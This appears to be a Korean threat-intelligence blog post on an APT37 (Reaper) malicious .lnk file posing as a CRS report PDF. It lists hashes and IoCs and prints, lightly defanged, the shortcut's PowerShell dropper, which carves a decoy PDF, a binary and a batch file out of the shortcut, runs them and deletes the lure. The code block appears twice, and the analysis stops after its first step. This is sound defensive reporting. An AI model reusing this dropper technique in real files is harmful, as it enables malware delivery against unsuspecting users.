북한 APT 리퍼(Reaper)에서 만든 악성코드-동북공정(미국의회조사국(CRS Report).pdf.lnk(2024.4.3)
Contents
오늘은 세계적으로 유명한 APT 조직 APT 북한 APT 리퍼(Reaper, APT37)에서 만든 악성코드 인 동북공정(미국의회조사국(CRS Report). pdf.lnk(2024.4.3)에 대해 글을 적어보겠습니다.
해당 악성코드 해쉬
파일명:동북공정(미국의회조사국(CRS Report).pdf.lnk
사이즈:58,894,509 Bytes
MD5:358122718ba11b3e8bb56340dbe94f51
SHA-1:0c61effe0c06d57835ead4a574dde992515b9382
SHA-256:b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56
해당 악성코드에 포함된 파워셀 코드
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k fo(r) /f "(t)okens=*" %a in
('dir C:\Windows\SysWow64\WindowsPowerShell\(v)1.0\*rshell(.)exe /s /b /od')
do call %a "$dirPath = Ge(t)-Location; if($di(r)Path -Match 'Syst(e)m32'
-or $dir(P)ath -Match 'Program Files') {$dir(P)ath = '%tem(p)%'}; $lnkPa(t)h =
Get-Chil(d)Item -Path $dirPath -Recurse *(.)lnk | where-object {$_.leng(t)h
-eq 0x03(8)2A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object
Syste(m).IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO(.)FileAccess]
::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=N(e)w-Object
byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B(4)DD3);$pdfPath
= $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pd(f)File -Encoding Byte;
& $pdfPath;$lnkFile.Seek(0x00(4)B5E63,[System.IO.SeekOrigin]::Begin);
$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Rea(d)($exeFile, 0, 0x000D9402)
;$exePath=$env:publi(c)+'\'+'panic(.)dat';sc $exePath $exeFile
-Encoding Byte;$lnkFile(.)Seek(0x0058F265,[System.IO.SeekOrigin]::Begin)
;$stringByte = New-Object byte[] 0x000005A(9);$lnkFile.Read($stringByte,
0, 0x00(0)005A9);$batStrPath = $env:temp+'\'+'para(.)dat';$string
= [System.Text.Encoding](:):UT(F)8.GetString($stringByte);$string
| Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,
[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;
$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'
+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString
= [System.Text.Encoding]::UTF8.GetString($batByte);$bastString
| Out-File -FilePath $executePath -(E)ncoding ascii;& $executePath;$lnkFile
.Close();remove-item -path $lnkPath -force;"&& exit
iconlocation: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
}
악성 코드 분석
1. dir 명령을 사용한 파일 검색
dir 명령으로 C:\Windows\SysWow64\WindowsPowerShell\v1.0\ 경로에서 특정 이름(rshell.exe)을 가진 파일을 검색
/s는 하위 디렉터리까지 검색 /b는 간결한 형식 /od는 날짜 순 …
해당 악성코드 해쉬
파일명:동북공정(미국의회조사국(CRS Report).pdf.lnk
사이즈:58,894,509 Bytes
MD5:358122718ba11b3e8bb56340dbe94f51
SHA-1:0c61effe0c06d57835ead4a574dde992515b9382
SHA-256:b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56
해당 악성코드에 포함된 파워셀 코드
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k fo(r) /f "(t)okens=*" %a in
('dir C:\Windows\SysWow64\WindowsPowerShell\(v)1.0\*rshell(.)exe /s /b /od')
do call %a "$dirPath = Ge(t)-Location; if($di(r)Path -Match 'Syst(e)m32'
-or $dir(P)ath -Match 'Program Files') {$dir(P)ath = '%tem(p)%'}; $lnkPa(t)h =
Get-Chil(d)Item -Path $dirPath -Recurse *(.)lnk | where-object {$_.leng(t)h
-eq 0x03(8)2A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object
Syste(m).IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO(.)FileAccess]
::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=N(e)w-Object
byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B(4)DD3);$pdfPath
= $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pd(f)File -Encoding Byte;
& $pdfPath;$lnkFile.Seek(0x00(4)B5E63,[System.IO.SeekOrigin]::Begin);
$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Rea(d)($exeFile, 0, 0x000D9402)
;$exePath=$env:publi(c)+'\'+'panic(.)dat';sc $exePath $exeFile
-Encoding Byte;$lnkFile(.)Seek(0x0058F265,[System.IO.SeekOrigin]::Begin)
;$stringByte = New-Object byte[] 0x000005A(9);$lnkFile.Read($stringByte,
0, 0x00(0)005A9);$batStrPath = $env:temp+'\'+'para(.)dat';$string
= [System.Text.Encoding](:):UT(F)8.GetString($stringByte);$string
| Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,
[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;
$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'
+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString
= [System.Text.Encoding]::UTF8.GetString($batByte);$bastString
| Out-File -FilePath $executePath -(E)ncoding ascii;& $executePath;$lnkFile
.Close();remove-item -path $lnkPath -force;"&& exit
iconlocation: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
}
악성 코드 분석
1. dir 명령을 사용한 파일 검색
dir 명령으로 C:\Windows\SysWow64\WindowsPowerShell\v1.0\ 경로에서 특정 이름(rshell.exe)을 가진 파일을 검색
/s는 하위 디렉터리까지 검색 /b는 간결한 형식 /od는 날짜 순 …
IoC
358122718ba11b3e8bb56340dbe94f51
b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56
0c61effe0c06d57835ead4a574dde992515b9382
b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56
0c61effe0c06d57835ead4a574dde992515b9382